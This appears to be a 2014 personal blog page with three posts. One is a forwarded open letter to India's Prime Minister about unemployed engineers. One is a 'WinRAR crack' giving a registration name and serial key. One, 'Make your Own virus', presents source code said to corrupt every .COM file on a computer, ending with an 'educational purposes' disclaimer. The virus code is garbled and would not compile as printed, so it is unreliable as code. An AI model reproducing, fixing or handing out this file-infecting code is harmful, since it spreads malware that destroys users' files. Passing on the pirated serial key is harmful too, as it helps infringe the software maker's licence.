Thursday 20 November 2014

The Engineers Voice (The Story of an Engineer )

The Engineers Voice (The Story of an Engineer ) --

Found somewhere on Facebook

Message to P.M from ENGINEERS.:-

Sir ,we have done 22 years of hard workcommitments and with hope..our parents have
invested lakhs of rupees for our education..But sir what is the use of it..Even after hard work for such a long time we are unemployed..My college dint even call up for a single company in campus drive.My seniors asked me to create account in naukri..But no use.. I only get updates for b.p.o and tech supports..sir s.s.l.c is more than enough to work in a b.p.o Seniors then asked me to go in search of a job myself..I did.. BUT companies today don't need fresher's they only need experience candidate..Companies are hiring fresher's only if they have good reference..But I don't have reference or influence :-I failed...Then some people asked me to approach some industries and to hand over my resumes  to watch man's.. I even did that..But watch man answers me that our company has vacancies only for I.t.I and diplomas,we don't need engineers..I failed...
Then some people suggested me to join some consultancy..I even did that..consultancy showed me a ray of hope. They arranged me for an interview.. I went there..first question asked by h.r was :- what will u do from morning til evening. I answered that I SEARCH jobs..he laughed at me and suggested to join some courses.. Okie..I even did that by investing some more money to complete my dreams. Then consultancy arranged me for one more interview I went there...it was a small scale industry.. I got selected in 3 rounds of interview. .H.R offered me 8000 to 10000 rupees per month with a two years bond in a metropolitan city where I at least need 10000 rupees to fulfill my basic needs has a bachelor..Respected sir would u accept this type of a  job..I guess NO..My friend who has secured very less marks than me us working in a M.N.C wil a package of 25000 because he had influence..Sir we have invested lakhs and have done hard work not to earn 8000.we avoid attending family programmes not because we have EGO but its because we don't have job.. First question asked by relatives is WHAT R U DOING NW..sir I feel ashamed to answer this question..Whenever I call my parents the first question they asked me is DID U GET A JOB.I again feel ashamed. .I have to ask money from my dad atleast for food and shelter.. This is the most worst moment.. I feel ashamed..  One small request sir if India don't have potential to give employment stop giving license to new colleges..100 new engineering college are been permitted every year in our country.. Is that important.. Around 15 lakh students are joining for engineering every year in our country.. Y is that sir..I have lost all my faith because I have gone through very bad times and failures..But I AM PROUD TO BE A ENGINEER.. This is not only my story ..but every engineer who don't have money and influence.. WE BADLY NEED YOUR HELP...U R OUR ONLY HOPE SIR @ NARENDRABHAI MODI Send it to everyone and One Day it will reach to our Pm.......

Sunday 9 November 2014

WIN RAR crack File Download free

        .....The First of all serial key if already installed.....  





  Name.....: YPOGEiOS                                          
           
  Serial...: RPRM2699978 




Sunday 12 January 2014

Make your Own virus

the most deadly virus...!

The following is the Source Code of Black Wolf Virus that can corrupt all the ".COM" files in your computer when it is compiled with C++ compiler.

=============================================

File*Virus, *Host;

int x,y,done;
char buff[256]

struct ffblk ffblk;

main()
{
done=(findfirst("*.COM",&ffblk,0);
while(!done)
{
Printf(infecting %s\n",ffblk.ff_name);
virus=fopen(_arg[0],"rb");
Host=fopen(ffblk.ff_name,"rb+");
x=9504;
while(x>256)
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
fcloseall();
done=findnext(&ffblk);
}
return(0);
}

DISCLAIM: This is only for Educational Purposes. Dont use it in wrong ways!